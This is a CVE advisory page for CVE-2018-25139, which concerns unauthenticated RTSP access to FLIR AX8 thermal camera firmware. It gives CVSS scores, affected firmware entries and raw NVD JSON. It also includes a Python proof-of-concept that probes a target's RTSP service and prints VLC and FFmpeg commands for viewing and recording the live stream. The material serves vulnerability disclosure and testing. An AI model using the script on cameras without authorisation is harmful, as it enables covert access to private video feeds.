Security Vulnerability Report
CVE-2018-25139 CVSS 7.5 HIGH

CVE-2018-25139

Published: 2025-12-24 20:15:48
Last Modified: 2025-12-31 18:40:36

Description

FLIR AX8 Thermal Camera firmware 1.32.16 does not require authentication on its RTSP service, which allows remote attackers to access live video streams without credentials. An attacker can connect directly to the RTSP stream with tools such as VLC or FFmpeg to view and record thermal camera footage.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

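cpe:2.3:o:flir:flir_ax8_firmware:1.32.16:*:*:*:*:*:*:* - VULNERABLE (firmware)
cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform; paired with the firmware entry above in an AND configuration, i.e. the firmware is vulnerable when running on this device)
cpe:2.3:o:flir:flir_ax8_firmware:1.17.13:*:*:*:*:*:*:* - VULNERABLE (firmware)
cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:* - NOT VULNERABLE (hardware platform; paired with the firmware entry above in an AND configuration)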
FLIR AX8 Thermal Camera firmware <= 1.32.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
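# CVE-2018-25139 PoC - FLIR AX8 Unauthenticated RTSP Stream Access
# Affected: FLIR AX8 Thermal Camera Firmware <= 1.32.16
import socket
import sys


def check_rtsp_unauthenticated(target_ip, port=554):
    """Report whether the RTSP service answers an unauthenticated OPTIONS request.

    Sends a single ``OPTIONS rtsp://<target_ip>:<port>/live`` request with no
    credentials and inspects the status line of the reply.

    Args:
        target_ip: Address of the camera under audit.
        port: RTSP TCP port (554 by default).

    Returns:
        True when the reply's status line is an RTSP/1.0 200, False for any
        other reply or when the connection fails.

    NOTE(review): many RTSP servers answer OPTIONS without asking for
    credentials even when the stream itself is protected, so a True result
    shows a reachable RTSP service that did not challenge this request; it is
    not on its own proof that the stream is exposed. Confirm the finding
    against the device's firmware version before reporting it.
    """
    # RTSP OPTIONS request without authentication
    rtsp_request = (
        f"OPTIONS rtsp://{target_ip}:{port}/live RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "User-Agent: PoC-CVE-2018-25139\r\n"
        "\r\n"
    )

    try:
        # The context manager closes the socket on every path, including a
        # failed connect or a receive timeout (the original leaked it there).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            sock.connect((target_ip, port))
            # sendall() retries until the whole request is written.
            sock.sendall(rtsp_request.encode())
            response = sock.recv(4096).decode('utf-8', errors='ignore')
    except Exception as e:
        # Script boundary: any failure is reported and treated as "not confirmed".
        print(f"[-] Error: {e}")
        return False

    # Judge only the status line, so that text later in the reply cannot be
    # mistaken for a successful status.
    status_line = response.split("\r\n", 1)[0]
    if status_line.startswith("RTSP/1.0 200"):
        print(f"[+] VULNERABLE: {target_ip} allows unauthenticated RTSP access")
        return True

    print("[-] NOT VULNERABLE or service unavailable")
    return False


def get_rtsp_stream_ffmpeg(target_ip, port=554):
    """Print the stream URL and the viewer commands a tester can run manually.

    Nothing is executed here; the function only formats and prints
    ``rtsp://<target_ip>:<port>/live`` together with example VLC and FFmpeg
    command lines (``ffmpeg -i rtsp://TARGET_IP:554/live -c copy output.mp4``).

    Args:
        target_ip: Address of the camera under audit.
        port: RTSP TCP port (554 by default).
    """
    stream_url = f"rtsp://{target_ip}:{port}/live"
    print(f"[+] Stream URL: {stream_url}")
    print(f"[+] Use VLC: vlc \"{stream_url}\"")
    print(f"[+] Use FFmpeg: ffmpeg -i \"{stream_url}\" -c copy output.mp4")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2018-25139.py <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    check_rtsp_unauthenticated(target)
    get_rtsp_stream_ffmpeg(target)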

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25139", "sourceIdentifier": "[email protected]", "published": "2025-12-24T20:15:47.957", "lastModified": "2025-12-31T18:40:36.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FLIR AX8 Thermal Camera 1.32.16 contains an unauthenticated vulnerability that allows remote attackers to access live video streams without credentials. Attackers can directly connect to the RTSP stream using tools like VLC or FFmpeg to view and record thermal camera footage."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:flir:flir_ax8_firmware:1.32.16:*:*:*:*:*:*:*", "matchCriteriaId": "F3C30C40-7473-4F2F-AEB7-5DD3C96A6186"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A4DACB7-0558-4C74-8EDB-39591236ADEE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:flir:flir_ax8_firmware:1.17.13:*:*:*:*:*:*:*", "matchCriteriaId": "82BDB498-9003-4C74-B197-914D35D0EEBE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:flir:flir_ax8:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A4DACB7-0558-4C74-8EDB-39591236ADEE"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45606", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.flir.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://www.exploit-db.com/exploits/45606", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5492.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}